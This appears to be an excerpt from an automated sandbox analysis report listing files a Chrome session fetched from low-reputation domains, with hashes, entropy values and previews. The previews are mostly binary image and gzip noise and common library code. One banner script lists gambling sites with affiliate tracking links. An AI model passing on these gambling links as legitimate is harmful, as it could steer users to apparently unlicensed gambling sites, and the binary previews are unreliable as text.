                                          Preview:.PNG........IHDR..............2.....OPLTE.............................................................................................$$$........................-%.222..........w..........**+......u_.3(.....^^^...................8-....NMN...............//0..........wqoVF......[PG.......ddd....}..................FEEN?............ZZZ..==>.........~{ziiiVVVAAA:99........IIJ...........~~~ppqnhee\U.....$.............ttvsmkjc_PPQ`VP....................666)#............G9.+!................G?7.)$...............yyy{ursrrSRS....s.yb.fS.A4..........~~......z..n.^L.mmmSIA...p[..i.TD....oe^A815/*........naX......w?......tRNS.....~`V1.....F......NIDATx...W..0..P.. .Z...u..[.,.1...h4c.|.l0=..`].q.7..44..ze..:.H7.ps...a.LD.r..,...[}%.)c.4g..]d.7..H1q...W...{M95...%<L.4....X...@CI..B....x..h).U.a_....;.@Q.r....z,..\..]..].o....0...8uu...j.t0 H.4tk P..8..nv. t).k.....3.0w?.7..a...#:..1.c...#:..1.c...#:..'Mt.j7...u...I.FD...,.b..2..{zdH....s..\....v..^...n...5+
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 20132
                                          Category:downloaded
                                          Size (bytes):5007
                                          Entropy (8bit):7.962533237385849
                                          Encrypted:false
                                          SSDEEP:96:h3Q+ZbYzRFELdDRT8sbfMgpF8h2qtTg6WZ8W1gMijlmZkO7FhC:h3VbYzRSxpD8h2qtkF176ls5Q
                                          MD5:8F17B626F7567907C75744E49F2A3F82
                                          SHA1:7721233D4187213262BC270A30D51BD591AAA688
                                          SHA-256:D6001C5431433A6DFCE869DA8A9467BAA51DEBC3220E116066AFE060D4919F73
                                          SHA-512:35781E036E4A59DE28217D51F2E1B85DA14B623081E52483A965D90B228CB6B0DE34EF087BA6F14FAC04160193891F4ED324D08006B4115E830509227BBCBD5D
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/bootstrap-dialog.min.js
                                          Preview:...........<.s.6....t|.b...1R..c;....g...9..%..m..T.....v.E..%..{o^..H..../......7YY..?.6Y.6.+R&..2^..Q.:."&IV..9<d....*...6..p.V...".s..5....<.%yM...x!.-f..Yc.-co.>..,.....(..L..V.<.%.soS.f]..3......>..@]....b{m.."..A`.Qu0.. ).XW..'e...ySV...<....(..@..N.AJ.....R...a..IX..|...:].......P.!...y...}..}..}.>~.$hH........!.............;.W.....:.}~q.......>.;>==.x..(..t#...8.tTe.q./_......O....n.?\.W.g.w.2.L..<C.E....IJ......".I..$Z..)(..6.."...1..&(..;..%t......A.>..Y}.(?._......@b.....a../..%!..Uz...(.\..?....$AN..Y...y.F.25...HN..YK)....xl.....We....!.<Z....q9_..L..I.k.......`. j..u.*.F.....A...p.g.. ..eV..qP.W.F..QQg(..C}.ET.(&....]R.Q.H.."v...[~~.f..,.}......\.QC4....7..A%.i.s...........8....H.$/?.Ehr...O.S.Z..k.7.....'e.z.!...1.0$D.O...)..=.E...*W...7.|..8...u.d.$.....a..(t.5l.....!...z.i..*..P.....#..;.<..v...;.[#.|..!.V.m0.....pKW$....:<..l\t_$X....t..F.\........vP.e#.Q.............o.M.... .^.3.......S?..h....z.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (21084)
                                          Category:dropped
                                          Size (bytes):21218
                                          Entropy (8bit):5.216818536486825
                                          Encrypted:false
                                          SSDEEP:384:knMQG5rwVO7dV9nNbRGCB9D45Hkn5vj2xpOxvIAgD75zBi5vISg3gzopL9TidOg6:P5sg7X/jD45eSxpOxvKD73i5vTzwL9T5
                                          MD5:C6946DFF4854D4611DA8AEF36666B938
                                          SHA1:9118198BD2A853BAA4644C6E819427150CA35160
                                          SHA-256:7028EF6262D35DB7DC22B05DF3CBB3E93595CE90CD340FDC356620D961B01224
                                          SHA-512:BB613298F726B820AA39F55851F2E11FE570FC7620C8CB6322F5CCD5726A2D230BABEEA76BDA3FC7D25BD11AB7F2F64B5BC138C177C5C42DBEF92EA20F3C4FE3
                                          Malicious:false
                                          Reputation:low
                                          Preview:/*. Copyright (C) Federico Zivolo 2019. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function i(e){return e&&e.referenceNode?e.referenceNode:e}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 18660
                                          Category:downloaded
                                          Size (bytes):3111
                                          Entropy (8bit):7.9338041567732756
                                          Encrypted:false
                                          SSDEEP:96:7Zk1m3+K/PmNfomGgTLRhIqaF/ul70DCnv:7Z3Pm9oQLR+qaslMCnv
                                          MD5:BC013C0567C33A98BE0767B19AC106DD
                                          SHA1:F58C32F32A3072D30F996207BBB089769DD9D826
                                          SHA-256:D5B7C17D36E6047F07D5C59C4C17DCAC04115103213AF0C84F5A7E898A8DC496
                                          SHA-512:D5358ADBC2B13E033E91F801F9289C92EF747BB5815ADA9ABA0D99667D57D4156D5A89350DF15F66B6E2E3140397347978FEC174AED09FB1B342DFE09F19417F
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/theme/default/layer.css?v=3.1.0
                                          Preview:............ko.8.{...E.$Wy%....M.W`...{@.w.@.h..,...8=..?R|.o.ISt.....c^....Gy.p.!..u...uZ..FJa.. U..t...6.AS........Zpj......_. .a...MWy..-....X.Ey_..?^...<x.A.4..J.e...3n]...*...X..).cK..a..WA.\,...+.P...Q.............E. .;P...=...L...*.H..l[...W.`..n.%7.....4..."+7...=Z....n....k.....O.*1.....oa?4a..K48.n.H<n....W...4.No.~.e.nZpH..,8#U.e....N7...<.Y.).^./.........U.).X...b.$. .:Cr.......8Z~.U-.N..&=..._D...o.hbAh.FW.6.zsB...y..;..!..'..F..f...c.~c.V./....uv.2..1\...X....._..vp{.l.Vp.U.a.*...K.t..@E5.*v.=.]Fm.....y..T,....=D.U3.... \....J..._..dH..h.&..4...O.J...f..Q....Hv@4..6as..<90=..D........-.4.....}.1.r..!,2pB.,..'.d6.kr@v.~.O...)....^R..f3.....L6..cd ........RLG.x..Pe. ...T.P.c...FI..*1].e.n..N.....8....F....K.4...N.f[.H...Jp1.^..L.]...'......O.B.3,....jxh~.a.....a.Yu.@.\).T.......}....o04.%..y<..p.E..:.c......./."..$.)2....c...k/(...z0.....!..:.2}..=....=..<i.z...W.?..e..S8...^..WI...[9....>........\..K?.f..<... .A....?.$....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text
                                          Category:dropped
                                          Size (bytes):2558
                                          Entropy (8bit):5.432204026699459
                                          Encrypted:false
                                          SSDEEP:48:IO5/R/DWwELcgalJbcs7aUu8q2cOaPSxWFdMofGFFOQ:9RLWwELxaX3aUuf2XaqJonQ
                                          MD5:6C7AED97CB5F9EF32988434D100AD5EB
                                          SHA1:366F3AF507B2EEFE86C0C74125FCDED76C46EB0D
                                          SHA-256:0C1C2169F84405AC83FF57827014C298B1655DC0D74A728D221C0D117A8712DA
                                          SHA-512:42FC2CB053B0EC1EFCB4E6A3EE04E74921163253F4DD2864E972807FA15475D0721E23C68CF72DD2BFC43C895D6947E5A74BE9AE850481F88981EEDED66E0C6A
                                          Malicious:false
                                          Reputation:low
                                          Preview:$(function() {. const str = window.location.href;. const idMatch = str.match(/\?id=(\d+)/);. const id = idMatch ? parseInt(idMatch[1], 10) : 0;.. const obj_slides = [. { id: 1, title: "BET365", url: "https://551000l.cc", src: "imgs/banner/banner.365.png" },. { id: 2, title: "...", url: "https://m399227.com", src: "imgs/banner/banner.tyc.png" },. { id: 3, title: "...", url: "https://j21716.com", src: "imgs/banner/banner.xpj.png" },. { id: 4, title: "....", url: "https://665339c.com", src: "imgs/banner/banner.wns.png" },. { id: 5, title: "....", url: "https://789400.cc/", src: "imgs/banner/banner.yh.png" },. { id: 6, title: "....", url: "https://service.sdqhwtvbtwdf.com/C.ashx?btag=a_18017b_2484c_&affid=2017190&siteid=18017&adid=2484&c=", src: "imgs/banner/banner.wlxeozb.png" },. { id: 7, title: "....", url: "https://e977110.com", src: "imgs/banner/banner.yl.png" },. { id: 8, t
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (65326)
                                          Category:downloaded
                                          Size (bytes):160257
                                          Entropy (8bit):5.076409168990226
                                          Encrypted:false
                                          SSDEEP:1536:a5K47WIXUNnNFTpNNN6nNIr+ryEIA1pDEBi8yNcuSEtbADGzIuypq3SYiLENM6Hn:A7feOGq3SYiLENM6HN26R
                                          MD5:9593715F4442D1F9D4E1A79E04481212
                                          SHA1:B480B8701ABF383A48C32C7535E2387A1BF04CF3
                                          SHA-256:1535585D0A5316A2DD4237A2A10D314DD174701C571F244CC0C44528B8B7FB3B
                                          SHA-512:887CC8002AC28D602FC5D2CF6CBBB3C04781B5DF45EFA3320F80461D5058F964A6ADD81D31B6D70C48A10274931B4E37C5ACDA0D4061920A6672ACFBB8A6ECE9
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/css/bootstrap.min.css
                                          Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#27ae60;--teal:#20c997;--cyan:#2770ae;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#27ae60;--info:#2770ae;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:bo
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 117433
                                          Category:downloaded
                                          Size (bytes):26968
                                          Entropy (8bit):7.989973612199997
                                          Encrypted:false
                                          SSDEEP:768:MpDKLSbr9FzuQKBmNEEG38V8anXFJU0huwW89:MAS9Nu/XEG3inXvhpW89
                                          MD5:228D1E3DC26674BFAD82AD7C49F100F4
                                          SHA1:786EDD830ACD664E7D1252305B9E2BA06698145A
                                          SHA-256:9AF2A0E25B339B1D953621CCD8BE977B85B46848EAAE9C938D379DFF7DC549C8
                                          SHA-512:36B3E085FE0682FAAFDC23B30C113395D607961C1059348F5897895B7CCCC8CC6FA32588A26B471A24A496EE47CA86B3544D0AE93C16F26F61758D23E33E89E6
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/moment.js
                                          Preview:............w..u(............l.4."..k.W.)...Cb,..b.Q...:i..u..Z.m.i.:m.M..i..[........n....s.f..n...qD`f..k.}..g...S. .$.I....E.u?..i6.V....R..=...^6...v:..dY.....at......f...D.l8.......z?.$.<......y...;.....ag.\..l?.7.........".L.GIv.%.F.x.GkkkQ-..5.Lj.'>.^...D...t.M..a.E.....z#Z5.3..W2..~..]..?.ZD&....d&....'.4.2.Rb.."...8.e..q...w.]...t:I...B.{...#....t<.H....\.N.P...p....../.F. S..u3(.$.J.i>I...D.....u.d...IO...#..0.N..8.'..0......&..j..I..m.'O&..Q.zG..e2.....Uc.@SL.K.q|\O...$P3....G.l.a+.'.....a..*4j...Q......'I);z...x...........Q....z<.C...R`w.'..wv.QzQ.8..Q=..K..4z....O.....ha!5ipi..h....Cd..".F....-8`.%.........nF..4Q...'.\A...<.@..S..BRh...~..n.O.t`..C.....E.eQ.".~|.5..5.|.;.2.?..I.~.&..Bt.....A...q.bih'{.Igo....}9.......A.%.(..;.1..7....(T.hF..4i..k...A...........~|.[J...$.&..@.u.d.u...P...j.R.U..F.c..*..~.4-..p.'.....n.....q..B."........Qk.....7...m.%.%..5}..D.t.. .n...c . B0W.]..A..7..Z.[.-......=L.F....#`...A.^#..n//..B
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text
                                          Category:downloaded
                                          Size (bytes):9140
                                          Entropy (8bit):5.514504954824791
                                          Encrypted:false
                                          SSDEEP:192:XP2d+TJjwa4wgxMlafG5EL592sArpQhJF79SNl:P6auOIamF4
                                          MD5:100CD91289E833DDD46FCB366ACF0D2A
                                          SHA1:522CC67517E7763DF0CF7ED6291F4EFCA58D5F53
                                          SHA-256:80B4606C57F8C3AA212DAECE6948102E24250653619FAC9ED2EA5583CD4F5D81
                                          SHA-512:38CAAD98518D8E04B1634CD6BB6CA0B553193F68DE8DED2EB617F407CF30AC1D5BE72F3C01ECA97B8D24DBFCB76CAF48BBB72FF8DC67C09D22B61D2FD9198D11
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/css/modalStyles.css
                                          Preview:/* --- ........ --- */../* ...... */..modal-backdrop.show {. opacity: 0.6;. backdrop-filter: blur(3px);.}../* ....... */..modal-content {. border-radius: 8px;. overflow: hidden;. box-shadow: 0 5px 10px rgba(0, 0, 0, 0.1);. font-family: 'Roboto', sans-serif; /* ..Roboto.. */. color: #333;. line-height: 1.5;.}../* ........ */..modal.fade {. opacity: 0;. transition: opacity 0.3s linear;.}../* .......... */..modal.show {. opacity: 1;.}../* ......... */..modal.show .modal-dialog {. transform: translateY(0);.}../* ......... */..fade .modal-dialog {. transition: transform 0.2s ease-out;. transform: translateY(-50%);.}../* ........ */..modal-body {. background-repeat: no-repeat;. background-position: center center;. font-size: 16px; /* ........ */. color: #555; /* ........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (858), with no line terminators
                                          Category:dropped
                                          Size (bytes):872
                                          Entropy (8bit):5.164057464392581
                                          Encrypted:false
                                          SSDEEP:12:2o7gXjLMi2A9E7CVtHCSYC6pdzX5PbSuZ1L2A9E7ClVeeoh57n1L2A9E7ClVqanr:2iGjIiouiu6p/PNZ1kdeU71kwrn
                                          MD5:AC480D48A02AE1E697BD6FBD7D42E8E8
                                          SHA1:C1E2BF1AB08BEB020AB404FAA5F42CDE77C99AEC
                                          SHA-256:2F5F4B70CA10C6F21E4EE19BC854A6754AB794AB4F51340A8F1B12444A2B91F8
                                          SHA-512:EED699DC90295C2D69858F20208DF69CEAD25852724BBFD3B84F51578FC5EEB86F3A5886246099B47849ABB2665CA4A6F373ADB784FE32779FD6FE70FBB7D094
                                          Malicious:false
                                          Reputation:low
                                          Preview:(function($){$.fn.isLocked=function(){var isLocked=false;if($(this).hasClass("ui-button-disable")){return true}var tagName=$(this).prop("tagName");if(tagName=="BUTTON"){var disabled=$(this).prop("disabled");if(disabled=="true"){isLocked=true}}else{var submited=$(this).prop("submited");if(submited=="true"){isLocked=true}}return isLocked};$.fn.lock=function(){var text={"en-US":"Waiting ...","zh-CN":".....","zh-TW":".....","ja-JP":"......"};$(this).each(function(){var tagName=$(this).prop("tagName");if(tagName=="BUTTON"){$(this).prop("disabled","true")}else{$(this).prop("submited","true")}$(this).addClass("ui-button-disable")})};$.fn.unlock=function(){$(this).each(function(){var tagName=$(this).prop("tagName");if(tagName=="BUTTON"){$(this).prop("disabled",null)}else{$(this).prop("submited",null)}$(this).removeClass("ui-button-disable")})}})(jQuery);
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 720x375, components 3
                                          Category:dropped
                                          Size (bytes):59822
                                          Entropy (8bit):7.972859276650181
                                          Encrypted:false
                                          SSDEEP:1536:j5p80J5hMhJ8PUHBqQ2CYEoPuAx65Tc7280A:NbEhaP0J6GA+3dA
                                          MD5:B84EC5622D797980B35FCB8DD953CE4C
                                          SHA1:BB3643572CFC19C69E80E0A9A543D19FEE457C0C
                                          SHA-256:CD57DB69B689EF023F2AE1E521D370C655E83B84D37DB8395605EAFE1BB7CA6A
                                          SHA-512:ADE6B9622CF3CBBE9E12B83C81D32222364930F5200E991B9AAEFC0911F089971F85DB0731B6736A7DA3F63871CD551CDD138A9B6EB46402DB328C2C8D133FCD
                                          Malicious:false
                                          Reputation:low
                                          Preview:......JFIF.............@ICC_PROFILE......0........mntrRGB XYZ ............acsp.......................................-....................................................desc.......trXYZ...d....gXYZ...x....bXYZ........rTRC.......(gTRC.......(bTRC.......(wtpt........cprt.......Tmluc............enUS...X.....s.R.G.B................................................................................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........para..........ff......Y.......[........XYZ ...............-mluc............enUS...8.....G.o.o.g.l.e. .I.n.c... .2.0.1.6...........................C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......w....".........................................W........................!..1..AQa."q..2...#B...$3Rbr........%4.&CScs.....56t...E..DTU................................;........................!.1.AQ"2aq.......#3B....R.$4C..b.............?..lA.>.....U9......1.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):5294
                                          Entropy (8bit):7.937849280289421
                                          Encrypted:false
                                          SSDEEP:96:Q0/zqWkEB5tP/GGhqd+9BWfV2EIWIKJFensiSCLhnLEARybIDf1V7:Q6oEBrPeGhE+bWd7MnsiSuhLpR80fD7
                                          MD5:B5F40F3C38B9464DBFAA82F5FCA1921B
                                          SHA1:1F3CDC4D8CFEBB93899220A15C26943E24973849
                                          SHA-256:0160DE7C57628AFC1694999264E44C99BEB18DFFDB2992BE7D8223ED5F3DDC94
                                          SHA-512:A193D308CEE71CBB01C7675D572134655FBF6778A711422E09EBCEFFB8732ED74D502335655F75D5A783601AB955E640F7978DF7D07A6AD30AD6D06A2713A812
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............2......PLTE...&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5%,3&-3...&.5#*2%,2)08#(/. ).#+,3:.'/..$"%,\..\..|.....8>E""')7A....B~.W..,>H .!/HTFLRkqupuz...KPV]..;k~=l.agkV..Z..X..2O][..._.._...........c..G.....=p.^bg3SbOTZ.....! %...Z......16=............>t.49@........?EL<BHx|.ty}...fjoCIN(3<....Z^cTY_...@z....8cvimr5Zj^.....Q....W..e..E........<p.6^p4XhK..B..N..I.....i.....x.......tRNS....[..~1.............IDATx...YR.0....-^c;I...`(.YH...../...<.:...l..2..[1e6)O...>.Y...6..K..S.c.G.@..;.B..tW~...M."s....=?..Q)...!.....z...en|.{&..](.O!x.d...%M......@PT.3....FH-....W.......j.M...9]...9]...9]...9]...9]...9]...9]...9]...9...9.......o=Hg................(.z}$.Q..D0....F.>..@.^..`..#... ...B..>.3r...Z....Y+/X.d.C'u>.II.m..bsU1.|.T.=R=&...q.S..a... .Bm Nx....&.N..T..^:.-.......Co$..W.i..Z^.ASi].A)...2.}g.hx......0..( ...z...Zhq...4[E........=.>H.[{^..7.F.....Up.I]K....u...'f..F...H&..1....X....B{(EK.D..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):43162
                                          Entropy (8bit):7.953145877023125
                                          Encrypted:false
                                          SSDEEP:768:WTC0nclGUxk45YhUb+TdhiKQc8XfCvHplUR5GZlCKP4CUoKNUaK:Wm0nclJ64cUSTaK38PCvJAoVwC2G
                                          MD5:369B22647FABC5FFC0211854F258589C
                                          SHA1:4450C1135E15EDE8AB1361AA187B186F594C5A8F
                                          SHA-256:6A0549CF5AFB7D4092E4034C163305C38D97DA27777D9710E4E7477DF6BEAB0C
                                          SHA-512:69D58556A422B3944F14D04A21D6E32B5FC8EC34A55ABBF0F4D39646F711EBD4402E3450E517E958F7E00CA35BEF4E00534B7A5106D8BBDE059ACD11EA0F7E6F
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/images/errors/ico-605.png
                                          Preview:.PNG........IHDR.............\r.f...aIDATx^...%U.7......'.&..a.C.A2..T.%...]..5...~.u..[.]]uE...L(.HP...!....{........<.9...f.....Su.nMw...1....<...#...==T..x.......3.^K...v...8......(...j..z\.z.$..s.^..;u.......q..W..x.RG.x...7.|......1J....=.1S......y...y>n.....$..Bi.2.%"..N.V:...:...x.S...+..V...R{....... t.]..H.z...9l.y......O?....w.1.:...?YA.J.SU./.c.=.x.n.&L. ....Y|.(s.e..j......T*....0.|..{.se`SE.f.B....|..w..................K/....0.....w.;T.wIoo.K....={r.`.h.f...b...8....g.7+.c2.0.0.......d2`.`&.C))..b.2...s....|.~.^e...g...w.c.<.G..t@.:..E.'N<[.?..........A8...5...**.P....`..f..........3I..QF.P..P........G?Z......(3.^:...x&.~...*....DA....7O2..z.@O.K.L.`.d.4....dppP...e..`.X.u~.L.k.q.........v{.....6...'O>1...,5...{@2i.$...:Tgy...88w..c........-.......oP&....mw..2:..3.=KA....9...Kl.Cm.2e.L.6....]..g%.....0....!l..$.m.uj...}.....D._/....eW.......W.....7+.......O.:......p~n....Hf...~.-[..........N|f.2.o...k^.61...:.?..Aj..A..2
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text
                                          Category:downloaded
                                          Size (bytes):2558
                                          Entropy (8bit):5.432204026699459
                                          Encrypted:false
                                          SSDEEP:48:IO5/R/DWwELcgalJbcs7aUu8q2cOaPSxWFdMofGFFOQ:9RLWwELxaX3aUuf2XaqJonQ
                                          MD5:6C7AED97CB5F9EF32988434D100AD5EB
                                          SHA1:366F3AF507B2EEFE86C0C74125FCDED76C46EB0D
                                          SHA-256:0C1C2169F84405AC83FF57827014C298B1655DC0D74A728D221C0D117A8712DA
                                          SHA-512:42FC2CB053B0EC1EFCB4E6A3EE04E74921163253F4DD2864E972807FA15475D0721E23C68CF72DD2BFC43C895D6947E5A74BE9AE850481F88981EEDED66E0C6A
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/banner.js
                                          Preview:$(function() {. const str = window.location.href;. const idMatch = str.match(/\?id=(\d+)/);. const id = idMatch ? parseInt(idMatch[1], 10) : 0;.. const obj_slides = [. { id: 1, title: "BET365", url: "https://551000l.cc", src: "imgs/banner/banner.365.png" },. { id: 2, title: "...", url: "https://m399227.com", src: "imgs/banner/banner.tyc.png" },. { id: 3, title: "...", url: "https://j21716.com", src: "imgs/banner/banner.xpj.png" },. { id: 4, title: "....", url: "https://665339c.com", src: "imgs/banner/banner.wns.png" },. { id: 5, title: "....", url: "https://789400.cc/", src: "imgs/banner/banner.yh.png" },. { id: 6, title: "....", url: "https://service.sdqhwtvbtwdf.com/C.ashx?btag=a_18017b_2484c_&affid=2017190&siteid=18017&adid=2484&c=", src: "imgs/banner/banner.wlxeozb.png" },. { id: 7, title: "....", url: "https://e977110.com", src: "imgs/banner/banner.yl.png" },. { id: 8, t
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 268 x 411, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):16719
                                          Entropy (8bit):7.98171793482572
                                          Encrypted:false
                                          SSDEEP:384:GVs8oiHguE1GrFCHWk9DxPjkG0j9X7JZ3c7mor1VtrNteisU1:wRoTuEgBCHWk9xLkGi9X7JFc7TVoI
                                          MD5:9C4488C5C4BAAAE0286BDA2A5CA555EB
                                          SHA1:0103D52A175D0D91ED500B11F67D73457F7ABC4A
                                          SHA-256:B7B9498D1BEABAE57D14A7806C87265571A0A5BBD1B5D49BC7029F1AAD3959D6
                                          SHA-512:1FFEA5410878209B78ADA1C4B105B229C691E789E0ADF31A38EA1E8CFADAC857A1317B4A8DAFD52EC7CC7BE119B22B3CADDC43613D91E97D8C42F02E3573F275
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............1^Z....PLTE........................................................[.........-....EnJ.}T!f>..g(....l)P...u,.y,.1.U5.@&...1.&...3.}6.Z#\:..r+*..vM.9#.....CvG..c'.w._&F+....;...X.C'..A.]$aA..S5.`&.S!#.....<#uT"..u.D.d.a.r7www.n..?.n).m*2...TG ..c.Iq@..M..>..>.X..8fH...A..L.I..n.l.U#...._&....;.g)O$...P...G....]>k6.....J....L.~=b2..a..X.e.R1%...3......W.c'.........Z..M.J......Y*...w.a..L.j5......1.|,....U.t>..0qqp.j.?XA...m.Q.......F......{<.....f..=.s.[.v/..y..aG6.....+......o.j&^F.[,.zxY-Gze.........t$pR.kMZ.z)N>.`6............a..W.oC.F4.Y&6cO...^**(.L!...K.*.U.pGFF=oZ./.6(....^.A..... #.976...d.....[[Z.,..c..taR1.0D.pv]H...j...uY..z_.H....tRNS...C.....1.|_'..Qn.......>3IDATx...[n. ..P.....&...Z..*j.QU@..9K...................%q_.k..z...J...nWrr:..r...>....v....uD<.t-9....B..u.8.&t.0.~|.#P..B......v.H...LB.........E..6%....y..*..B...j)Z...Gjg...*....Q.g..Z.........g.W^....O.je}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1780 x 2251, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):32644
                                          Entropy (8bit):7.829276987696952
                                          Encrypted:false
                                          SSDEEP:768:Clok4IJkWG10A5zCtUQ/aVS5GYqj07NT0pvUi9VJpM:Cqk4IJkJ+4tQ6ZVj0pTpp
                                          MD5:8F0CD5F85D6DE29491700D70995017FF
                                          SHA1:91B6374B9717A6D9DF3574AD1A246D7DA44DBF1B
                                          SHA-256:EB0BE5A9C93ED5EF86EDA2EC2DE2D8BDB24BF08E048DBDB7E8161444F46AD63A
                                          SHA-512:EC35EB9E5C185DE7A87AD56A25C6AC430718850653532EFD0A4DFDE4A731085EFE07EBF595BD665A3F59F937A5BD3D4350A7CC0C74B1E9B1937D3F56A9AD0EAA
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR....................PLTE......................................................................................................................................n....+tRNS.2_.C.....T.N..p....g...!w...H8=.+.&..X.z../...~.IDATx.........................................................................`..@.........TUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU.=8........m.UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUa.^w...(.O.P..;$.......e...*.j..8..%V:3;.....xsM...u.1.......J.y..X..N6U.;....f..V.ou.....n]..|.............q.................~....w..Ekf.Mz.oz.....l..B......V:...(....M..P.<..j...RO.......@........E.C.......n.t.[.....d..M=...0`9...2.`...n.z4......y.....!g..........M...#g..r..0.."g.Gs..0.u;_W...tVR.....xO.l~..S+.@Y..We.j..(.j.3.....2..=w....w'*..Q..O.. .F.R..1...a #......<...9.P.....~..P.A...v....e.M.$.......N'.....O&..#.....$5A'....{.ij.y..Z.M3....d.....fi..|+p2aO....bf`........{.....T.4.........R.=....4...p6M3.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 12051
                                          Category:downloaded
                                          Size (bytes):3316
                                          Entropy (8bit):7.9446882423582625
                                          Encrypted:false
                                          SSDEEP:96:HDAjAUuXSgof7U774DMcxFzOou3cVzXihx:HDARuXfofG7AMcyotGx
                                          MD5:902AE6C577FFAAD07A9FF299CE0AB884
                                          SHA1:294C86C2FC8DC7E2AACF10BEF6334E43466819F4
                                          SHA-256:225EFABD27CE5D8F1E842EFD8C5B987761E56EF00F0DCF0E38C10766D29A7904
                                          SHA-512:C0CE3989442018160307B28602EB0C76339D286CFE13C7382F1B4B1CF4FBE5F8A2838D0411E4303AAE89E93FAE104BB8E25E5C3D3CA1EA2A4CA06A20B24C9019
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/websocket/CometMarathon.js
